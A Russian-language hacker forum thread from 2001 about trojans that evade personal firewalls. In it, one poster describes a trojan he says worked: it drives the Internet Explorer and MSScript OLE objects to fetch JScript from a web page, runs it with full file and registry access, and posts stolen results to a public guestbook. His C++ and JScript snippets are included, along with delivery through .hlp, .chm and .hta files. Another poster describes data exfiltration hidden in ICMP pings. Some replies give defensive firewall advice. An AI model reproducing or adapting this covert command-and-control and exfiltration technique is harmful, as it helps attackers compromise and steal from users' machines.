За телепузиков спасибо.
Рассказываю подробнее. Прошу прощение (и некоторое снисхождение) за слабую терминологию, я еще не волшебник, я только учусь...
Я воспльзовался стандартными OLE-серверами IE и MSScript. Сначала загружается некоторая html страница с помощью объекта сервера IE, здесь ФВ ничего не предпринял, хотя объект был создан как CLSCTX_INPROC_SERVER. Но даже при отрицательном результате, можно было бы ещё воспользоваться CLSCTX_LOCAL_SERVER.
Загруженная html страница, содержала в себе обычный текст JScript, который загружался в MSScript и выполнялся. Далее результаты отправлялись обратно через IE по POST.
Т.о. управление трояном усложняется, но появляется автономность и повышается анонимность, т.к. я могу закачать html страницу в любое время, а троян начнет выполнять помещенную на неё прогу (точнее скрипт) в момент своей активизации.
Замечание: скрипт выполняется не в контексте IE, как содержимое html-страницы, а отдельно объектом MSScript, как локальный файл .js, т.о. нет ограничений на операции с файлами, реестром и т.п.
В заключении скажу, что это действительно было опробаванно и работало.
Кроме того скажу, что троян был заслан с помощью .hlp файла. Был и менее надежные способы зысылки, использующие баги IE: html+chm и .hta, но тоже срабатывало: html+chm - около 70% под 98, hta - 70-80% под 98 и 2000 (не сичитая SP2, здесь такое не покатывает)
> > > Вот если такой троян обойдет мои ФВ-лы пожму челу > > руку:))) > > > > Троян, который обходит ФВ - легко! > Звучит не убедительно! > Попробуй еще разок:) > > > Троян ----(ФВ)----> "Место встречи" <----- > Клиент > > трояна > > Может в картинках или на пальцах мне покажешь?:))) > > > Если троян будет не слушать, а сам посылать запросы > > некоторому хосту ("Место встречи"), функция которого > > передавать запросы от клиента, то всё должно > прокатить. > > Вот последнее слово "должно"... говорит о том, что ты типа > догадываешься или знаешь наверняка? > Стыдно сначала утверждать, а потом самому же сеять > сомнения:))) > > Чтож касается прослушивания то ты видимо даже не понимаешь > о чем говоришь:))) > У меня например за все время пользования различными > фаерволами не встречал, чтоб они реагировали на пассивное > прослушивание портов!:) Это бред! Это не функция ФВ. > А если троян будет передавать запросу куда-нибудь это уже > работа ФВ и => он это заметит, отфильтрует или предложит > создать правило, что этого соединения и приложения! > Отсюда вывод: Телепузики тебе еще надо смотреть, а не лапшу > на уши людям вешать:) > > P.S. Кстати я конечно лукавил и сам знаю несколько способов > обойти ФВ, но это не абсолют,а лишь для некоторых "липовых" > фаерволов. Но ATGuard как я понимаю тоже обходится одним из > таких способов. > > Удачи!
Люди кто знает может есть какие то новые супернавороченные трояны, которых не видят антивирусы и их коннекты не засекает фаерволл, прописанные ка-то необычно не в реестре или в вин.ини. Устал от того что меня все время один чел находит как только я в инет лезу!!!
Помогите плиззз....
вопросы13.12.01 05:58 Автор: йцукенг <jcukeng> Статус: Member
> Люди кто знает может есть какие то новые супернавороченные > трояны, которых не видят антивирусы и их коннекты не > засекает фаерволл, прописанные ка-то необычно не в реестре > или в вин.ини. Устал от того что меня все время один чел > находит как только я в инет лезу!!! > Помогите плиззз....
Пока вроде нет:).
Есть подозрение, что ты фв себе криво настроил.
Посему вопросы:
#0. на основании чего ты делаешь вывод, что этот некто тебя находит, когда ты лезешь в инет?
0.1. У тебя случайно не статический IP? :) Если да, то на остальные вопросы можешь не отвечать.
0.2. под какой осью работаешь?
1. Пользуешься ли ты аськой? Если да, юзаешь ли при этом твикер?
2. Какой фв у тебя стоит?
3. Приведи ВСЕ правила твоего фв.
После этого попытаюсь тебе помочь.
> ФВ - аутпост, аську давно не юзаю, ip - динамический, а вот > ось - 98 > Может фв следует поменять? ну, если хочешь поменяй.:)
под виндами меня AtGuard вполне устраивает, например. поставь, может и тебе понравится.
но сначала погоняй дрвеб.
и посмотри, что у тебя стоит в автозапуске(смотри, естественно, в реестре - надеюсь, сообразишь где).
привел бы правила фв. я понимаю, что нудно это, но иначе трудно сказать, где у тебя дыра в защите. кстати, логи ведешь?
> > Люди кто знает может есть какие то новые > супернавороченные > > трояны, которых не видят антивирусы и их коннекты не > > засекает фаерволл, прописанные ка-то необычно не в > реестре > > или в вин.ини. Устал от того что меня все время один > чел > > находит как только я в инет лезу!!! > > Помогите плиззз....
Вот если такой троян обойдет мои ФВ-лы пожму челу руку:)))
> > Пока вроде нет:). > Есть подозрение, что ты фв себе криво настроил. > Посему вопросы: > > #0. на основании чего ты делаешь вывод, что этот некто тебя > находит, когда ты лезешь в инет? > 0.1. У тебя случайно не статический IP? :) Если да, то на > остальные вопросы можешь не отвечать. > 0.2. под какой осью работаешь? > 1. Пользуешься ли ты аськой? Если да, юзаешь ли при этом > твикер? > 2. Какой фв у тебя стоит? > 3. Приведи ВСЕ правила твоего фв.
йцукенг Я конечно понимаю твой альтруизм, но все правила ФВ это сильно:)
Скорее всего статичный IP или Аськин клиент... хотя вероятность Коника тоже есть:)))
> После этого попытаюсь тебе помочь.
Если троян будет не слушать, а сам посылать запросы некоторому хосту ("Место встречи"), функция которого передавать запросы от клиента, то всё должно прокатить.
Может в картинках или на пальцах мне покажешь?:)))
> Если троян будет не слушать, а сам посылать запросы > некоторому хосту ("Место встречи"), функция которого > передавать запросы от клиента, то всё должно прокатить.
Вот последнее слово "должно"... говорит о том, что ты типа догадываешься или знаешь наверняка?
Стыдно сначала утверждать, а потом самому же сеять сомнения:)))
Чтож касается прослушивания то ты видимо даже не понимаешь о чем говоришь:)))
У меня например за все время пользования различными фаерволами не встречал, чтоб они реагировали на пассивное прослушивание портов!:) Это бред! Это не функция ФВ.
А если троян будет передавать запросу куда-нибудь это уже работа ФВ и => он это заметит, отфильтрует или предложит создать правило, что этого соединения и приложения!
Отсюда вывод: Телепузики тебе еще надо смотреть, а не лапшу на уши людям вешать:)
P.S. Кстати я конечно лукавил и сам знаю несколько способов обойти ФВ, но это не абсолют,а лишь для некоторых "липовых" фаерволов. Но ATGuard как я понимаю тоже обходится одним из таких способов.
Удачи!
какое же ты все таки хамло23.12.01 17:46 Автор: hex.sex <Computer-Hitler> Статус: Elderman
За телепузиков спасибо.
Рассказываю подробнее. Прошу прощение (и некоторое снисхождение) за слабую терминологию, я еще не волшебник, я только учусь...
Я воспльзовался стандартными OLE-серверами IE и MSScript. Сначала загружается некоторая html страница с помощью объекта сервера IE, здесь ФВ ничего не предпринял, хотя объект был создан как CLSCTX_INPROC_SERVER. Но даже при отрицательном результате, можно было бы ещё воспользоваться CLSCTX_LOCAL_SERVER.
Загруженная html страница, содержала в себе обычный текст JScript, который загружался в MSScript и выполнялся. Далее результаты отправлялись обратно через IE по POST.
Т.о. управление трояном усложняется, но появляется автономность и повышается анонимность, т.к. я могу закачать html страницу в любое время, а троян начнет выполнять помещенную на неё прогу (точнее скрипт) в момент своей активизации.
Замечание: скрипт выполняется не в контексте IE, как содержимое html-страницы, а отдельно объектом MSScript, как локальный файл .js, т.о. нет ограничений на операции с файлами, реестром и т.п.
В заключении скажу, что это действительно было опробаванно и работало.
Кроме того скажу, что троян был заслан с помощью .hlp файла. Был и менее надежные способы зысылки, использующие баги IE: html+chm и .hta, но тоже срабатывало: html+chm - около 70% под 98, hta - 70-80% под 98 и 2000 (не сичитая SP2, здесь такое не покатывает)
> > > Вот если такой троян обойдет мои ФВ-лы пожму челу > > руку:))) > > > > Троян, который обходит ФВ - легко! > Звучит не убедительно! > Попробуй еще разок:) > > > Троян ----(ФВ)----> "Место встречи" <----- > Клиент > > трояна > > Может в картинках или на пальцах мне покажешь?:))) > > > Если троян будет не слушать, а сам посылать запросы > > некоторому хосту ("Место встречи"), функция которого > > передавать запросы от клиента, то всё должно > прокатить. > > Вот последнее слово "должно"... говорит о том, что ты типа > догадываешься или знаешь наверняка? > Стыдно сначала утверждать, а потом самому же сеять > сомнения:))) > > Чтож касается прослушивания то ты видимо даже не понимаешь > о чем говоришь:))) > У меня например за все время пользования различными > фаерволами не встречал, чтоб они реагировали на пассивное > прослушивание портов!:) Это бред! Это не функция ФВ. > А если троян будет передавать запросу куда-нибудь это уже > работа ФВ и => он это заметит, отфильтрует или предложит > создать правило, что этого соединения и приложения! > Отсюда вывод: Телепузики тебе еще надо смотреть, а не лапшу > на уши людям вешать:) > > P.S. Кстати я конечно лукавил и сам знаю несколько способов > обойти ФВ, но это не абсолют,а лишь для некоторых "липовых" > фаерволов. Но ATGuard как я понимаю тоже обходится одним из > таких способов. > > Удачи!
> За телепузиков спасибо. > Рассказываю подробнее. Прошу прощение (и некоторое > снисхождение) за слабую терминологию, я еще не волшебник, я > только учусь... > Я воспльзовался стандартными OLE-серверами IE и MSScript. > Сначала загружается некоторая html страница с помощью > объекта сервера IE, здесь ФВ ничего не предпринял, хотя > объект был создан как CLSCTX_INPROC_SERVER. Но даже при > отрицательном результате, можно было бы ещё воспользоваться > CLSCTX_LOCAL_SERVER. > Загруженная html страница, содержала в себе обычный текст > JScript, который загружался в MSScript и выполнялся.
Именно!
Я например джавой совсем не пользуюсь по известным причинам:)
Следовательно и скрипт я не получу:) Потом сам скрипт даже если и будет загружен скорее детектируется AVP Scripter ... подобные случаи уже были:)
Далее
> результаты отправлялись обратно через IE по POST. > Т.о. управление трояном усложняется, но появляется > автономность и повышается анонимность, т.к. я могу закачать > html страницу в любое время, а троян начнет выполнять > помещенную на неё прогу (точнее скрипт) в момент своей > активизации.
Вот тут подробнее куда ты и как ее будешь качать?
> Замечание: скрипт выполняется не в контексте IE, как > содержимое html-страницы, а отдельно объектом MSScript, как > локальный файл .js, т.о. нет ограничений на операции с > файлами, реестром и т.п. > > В заключении скажу, что это действительно было опробаванно > и работало. > Кроме того скажу, что троян был заслан с помощью .hlp > файла. Был и менее надежные способы зысылки, использующие > баги IE: html+chm и .hta, но тоже срабатывало: html+chm - > около 70% под 98, hta - 70-80% под 98 и 2000 (не сичитая > SP2, здесь такое не покатывает)
> Именно! > Я например джавой совсем не пользуюсь по известным > причинам:) > Следовательно и скрипт я не получу:) Потом сам скрипт даже > если и будет загружен скорее детектируется AVP Scripter ... > подобные случаи уже были:)
Что-то я совсем плохо объясняю...
1) скрипт загружается как текстовый документ в IE:
<HTML><BODY>
var fso, f, s;
fso = new ActiveXObject("Scripting.FileSystemObject");
f = fso.CreateTextFile("testfile.txt", false);//true);
f.WriteLine("This is a test.");
f.Close();
</HTML></BODY>
Не думаю, что AVP его отловит. Сейчас у тебя AVP возмутился? А ведь скрипт тремя строчками выше. :о)
2) Далее вырезается с помощью get_innerText:
(GetHtmlDocument())->QueryInterface(IID_IHTMLDocument2, (void**)&pDoc);
pDoc->get_body(&pElem);
pElem->get_innerText(&Code);
3) Загружается в MSScript:
pScriptControl->Language="JScript";
pScriptControl->AddCode(Code);
Даже если у тебя не установлен MSScritp, его вполне можно закачать и зарегистрировать автоматически трояном. Как буду закачивать? С помощью <IMG SRC=...> опять же через IE.
> > результаты отправлялись обратно через IE по POST. > Вот тут подробнее куда ты и как ее будешь качать?
В моем случае для простоты я сгружал всё в гостевую книгу на guesbook.ru
5) Загружается страница с формой для ввода нов. сообщения в ГК
6) Заполняется форма результатами работы (текст. инф-я):
pFormElem->item(Variant("comm"), Variant(0), &pdisp);
pdisp-> QueryInterface(IID_IHTMLTextAreaElement, (void**)&pAreaElem);
pAreaElem->put_value(Result);
7) Жмется <Submit>
pFormElem->submit();
"Для простоты" = не заморачивался с написанием "приемной стороны".
Ясно, что можно написать и свой cgi-скрипт, разместить его на каком-нибудь бесплатном хостинге и получать нужную инфо туда. Нет проблем и с передачей файлов, но это понятно. Я (опять же, для простоты) закачивал файлы от "жертвы" на geocities.com через их (geocities) FileManeger, вот только расширения надо изменять, т.к. не все форматы там разрешены к аплоаду.
прикольно, конечно, но есть одно "но"17.12.01 18:54 Автор: _йцукенг_из-под_фри Статус: Незарегистрированный пользователь
у меня в виндах, например, специальное правило есть, запрещающее всем прогам, кроме netscape, SecureCRT и зеБат! выходить в инет ;)
напиши троя для такого клинического случая ;)
btw левые проги на своем компе я запускаю крайне неохотно
"прикольно, конечно..." и мне прикольно23.12.01 03:28 Автор: Sampan Статус: Незарегистрированный пользователь
Вариант 1.
Исходящие ICMP пакеты. Гарантированно, ты их не блокируешь.
Мне известен случай, когда посредством ICMP (подтип Echo Request - это те пакеты, которые использует ping) был выкачен наружу 2 мб архив! Кстати, из-под двух firewall, один из которых был Cisco PIX, настроенный крутым CCIE.
Вариант 2.
UDP броадкасты с 137 порта. Ты их то-же фильтруешь? С их помощью Виндовз громогласно всем объявляет о своем присутствии.
Кстати, именно так можно находить компьютеры с динамическими IP - по имени!
Совет человеку, которого постоянно находят в сети: для начала поменять имя компьютера (самое простое :-)) Во-вторых, запретить в файрволле UDP IN/OUT local-137 remote-any (если он того позволяет, конечно)
совсем прикольно...25.12.01 14:16 Автор: Miracle Статус: Незарегистрированный пользователь
> > напиши троя для такого клинического случая ;) > > Вариант 1. > Исходящие ICMP пакеты. Гарантированно, ты их не блокируешь.
А если такой клинический случай и блокируются или вернее фильтруются?:)
Например я еще давно писал про фильтровку протокола ICMP.
> Мне известен случай, когда посредством ICMP (подтип Echo > Request - это те пакеты, которые использует ping) был > выкачен наружу 2 мб архив! Кстати, из-под двух firewall, > один из которых был Cisco PIX, настроенный крутым CCIE.
Ну это кстати не ново... о этом Трое давно читал уже.
> > Вариант 2. > UDP броадкасты с 137 порта. Ты их то-же фильтруешь?
Нет! Я просто их блокирую!)))
> Во-вторых, запретить в файрволле UDP IN/OUT local-137 > remote-any (если он того позволяет, конечно)
Об чем вопрос?:)))
re23.12.01 11:10 Автор: йцукенг <jcukeng> Статус: Member
> Вариант 1. > Исходящие ICMP пакеты. Гарантированно, ты их не блокируешь. > Мне известен случай, когда посредством ICMP (подтип Echo > Request - это те пакеты, которые использует ping) был > выкачен наружу 2 мб архив! Кстати, из-под двух firewall, > один из которых был Cisco PIX, настроенный крутым CCIE. очень хороший вариант.
и у меня может прокатить:((.
кстати - что за трой был?
> UDP броадкасты с 137 порта. такое только дети не закрывают.
udp у меня разрешен только от/к DNS-серверам провайдера. и все.
Названия сего чуда не знаю.
Я наблюдал лишь результаты его работы по логам :-( На внутренней машине была запущена неопознанная программа, которая с интервалом 0,5 секунды по определенному внешнему IP посылала Echo Request с необычно большим полем data. Естественно, с этого IP никакие Echo Replay не возвращались. По исходящему траффику ICMP в этот адрес определили объем переданных данных. Внутреннего злодея вычислили, но дело уже было сделано :-(
Сдается мне, что в диком виде такие трояны не существуют. Они пишутся "под заказ". Соответственно, ни какими антивирусами не отлавливаются и файрволлами не блокируются.
> у меня в виндах, например, специальное правило есть, > запрещающее всем прогам, кроме netscape, SecureCRT и зеБат! > выходить в инет ;) Я сзоду все проги и не вспомню: Explorer....и пожалуй ВСЕ:)))
Для мыла и сканера я делаю разовое разрешение если понадобится...:)
> напиши троя для такого клинического случая ;)
Во-первых, Нетскапе тоже предоставляет OLE server браузера.
Во-вторых, зеБат, конечно, клево, но ведь юзер может запустить троян из аттачмента и сам, "I Love you" это прекрасно ещё раз продемонстрировал. Тем более, что троян можно запихать в такой безопасный с виду для простого юзера файлик .HLP.
В-третьих, не надо быть таким агрессивным :о)
Не буду я даже и пробовать зае**ся... :о)
Я рассказываю всё это только по тому, что этот способ я уже использовал, то, что надо, получил. Теперь вы либо воспользуйтесь, либо своих юзеров предупредите.
> > у меня в виндах, например, специальное правило есть, > > запрещающее всем прогам, кроме netscape, SecureCRT и > зеБат! > > выходить в инет ;) > Я сзоду все проги и не вспомню: Explorer....и пожалуй > ВСЕ:))) > Для мыла и сканера я делаю разовое разрешение если > понадобится...:) > > напиши троя для такого клинического случая ;) > > Для моего он писать зае**ся!:)))
подробно о проекте
Анализ криптографических сетевых...
новое сообщение
закрытая нитка
новое сообщение
в закрытой нитке
старое сообщение
